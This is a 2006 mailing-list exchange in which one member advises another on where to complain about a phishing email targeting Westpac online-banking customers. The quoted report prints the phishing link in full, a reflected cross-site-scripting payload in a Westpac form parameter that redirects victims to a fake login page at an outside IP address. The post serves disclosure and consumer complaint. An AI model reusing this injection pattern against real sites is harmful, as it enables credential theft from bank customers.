[LINK] Phishing plumbs new depths for Westpac Customers: XSS
Roger Clarke
Roger.Clarke at xamax.com.au
Tue Nov 21 12:18:44 AEDT 2006
Rick, please send this in the form of a complaint to:
- the Privacy Commissioner
- the ABA
- AGIMO
- AusCERT
Sure, they'll all fall over backwards flick-passing it to one
another. But there's a lot of nervousness in the Internet Banking
security arena at present, and your good, solid detail could really
hit the spot.
Make sure they understand that there are *two* incident reports in one:
- the new form of phish
- the completely inadequate incident reporting mechanism
You could also draw attention to the complaints-handling standards:
AS 4269:1995
ISO 10002:2004
At grave risk of telling you how to suck eggs:
http://www.privacy.org.au/Resources/Complaints.html
At 11:02 +1100 21/11/06, Rick Welykochy wrote:
>Just ran across this attempt at phishing for my Westpac username and password:
>(snipped from the phishing email)
>
>
> Westpac Banking
>
> No additional action is required by you to continue to
> use your online services.
>
> To review the changes [to Terms and Conditions], click on the link below:
>
>and here is the link:
>
> https://www.westpac.com.au/forms/AskWestpac.nsf/
> f_askWestpac?OpenForm&refTitle=<script>document.location=
> 'http://203.144.80.87/manual/.modonline/new.html'</script>
>
>I broke up the link into 3 parts for readability. The link does actually
>look valid, it takes you to the Westpac secure web site, but then the
>XSS (cross-site scripting) redirects you to a fake login page at
>http://203.144.80.87/manual/.modonline/new.html.
>
>Try http://tinyurl.com/tksrx if you wish to see it in action.
>
>I'm afraid this one might catch all but the technically savvy amongst us.
>
>Westpac has been contacted about this. Unfortunately, their website
>has web-based
>forms only for email and no interface is provided to alert their IT staff to
>the existence of such a hoax as the one above. I had to submit the email and
>further details via a pitifully inadequate web form. I have my doubts as to
>how far into the system my alert will survive. And I note with some
>annoyance that
>the link for actual feedback does not work (never returns a page) so I had to
>use a far less appropriate page.
>
>The page that would not respond to my browser is here:
>http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
>Can other Linkers actaully see this page? I cannot, neither with Firefox
>or with Safari.
>
>
>
>cheers
>rickw
>
>
>
>
>--
>_________________________________
>Rick Welykochy || Praxis Services
>
>Welcome to the department of redundancy department.
>
>_______________________________________________
>Link mailing list
>Link at mailman.anu.edu.au
>http://mailman.anu.edu.au/mailman/listinfo/link
--
Roger Clarke http://www.anu.edu.au/people/Roger.Clarke/
Xamax Consultancy Pty Ltd 78 Sidaway St, Chapman ACT 2611 AUSTRALIA
Tel: +61 2 6288 1472, and 6288 6916
mailto:Roger.Clarke at xamax.com.au http://www.xamax.com.au/
Visiting Professor in Info Science & Eng Australian National University
Visiting Professor in the eCommerce Program University of Hong Kong
Visiting Professor in the Cyberspace Law & Policy Centre Uni of NSW
More information about the Link
mailing list